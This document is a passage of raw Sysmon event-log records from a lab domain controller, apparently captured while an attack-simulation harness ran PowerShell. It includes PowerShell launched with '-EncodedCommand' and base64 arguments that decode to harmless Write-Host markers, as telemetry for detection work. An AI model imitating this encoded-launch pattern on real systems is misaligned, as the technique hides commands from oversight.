VwByAGkAdABlAC0ASABvAHMAdAAgAGQAYwBhAGMAYgA2AGYANgAtADIANgAzADUALQA0ADgANgBmAC0AYQBlAGIAYQAtADYAOAA5ADMAMQA0AGIAOABkADkAZQBmAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.481{05ADC7E1-6D47-603E-69AA-00000000AD01}11140ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.371{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.371{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002235383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:13.436{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-974.attackrange.local138netbios-dgm 354300x80000000000000002235382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:13.436{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-974.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 10341000x80000000000000002235381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.323{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.323{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:23.313{05ADC7E1-6D47-603E-69AA-00000000AD01}11140\PSHost.132591775432131645.11140.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.278{05ADC7E1-6D47-603E-69AA-00000000AD01}11140ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_dy2jkx4z.csu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.278{05ADC7E1-6D47-603E-69AA-00000000AD01}11140ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tvwfds4r.ydc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.262{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tvwfds4r.ydc.ps12021-03-02 16:52:23.262 10341000x80000000000000002235375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.246{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.216{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.200{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.213{05ADC7E1-6D47-603E-69AA-00000000AD01}11140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedComman VwByAGkAdABlAC0ASABvAHMAdAAgAGEAYwBiADIANgAwAGUANgAtADQANQAwAGYALQA0AGEAYgBlAC0AOAAyADEANQAtADMAOABlAGQAMgA0ADkAZQBmAGUAMgA3AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6693A3608B9C5747D7BE4B43EC537651,SHA256=6007081BDD5BE4D82DC51E77EED122393EDACC92FD94AFAB990D4EB88386C8E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.184{05ADC7E1-6D46-603E-68AA-00000000AD01}2712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.075{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.075{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.023{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.023{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:23.016{05ADC7E1-6D46-603E-68AA-00000000AD01}2712\PSHost.132591775429183986.2712.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:24.637{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=795E5A18EA107CDEB613C5214ED3959F,SHA256=325E64255DA04DF2FE2FCE3FE7EDD1AB786CEDF700A83A990E1A7CFF0DCA8273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:24.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6817759C6E95D00A8647DB62240AEBAE,SHA256=66A481792F53C0D2F766C044AFA370B3D7C763FDDD29221F6E017E74D755828E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:25.590{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AC1A4B29A35493DA3564D2BECE82878,SHA256=05346898F61A032D411CB63899611A09211A025C3104362501E46D544F661203,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:25.278{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD756F2059229F988E59E4C966AFABC,SHA256=F7934C1C1BE3A2149B5059428FB668CAD15B0C1E1D0D7D91B3765BDAF2064421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:26.278{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E94C7B84FDE58A9866282E5C5B8CDD5,SHA256=7727493B4DE30B19A91CD00591221F6AC4445059B7BF13F524877486769FDA42,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:17.275{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60122-false10.0.1.12-8000- 23542300x80000000000000002235413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:27.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 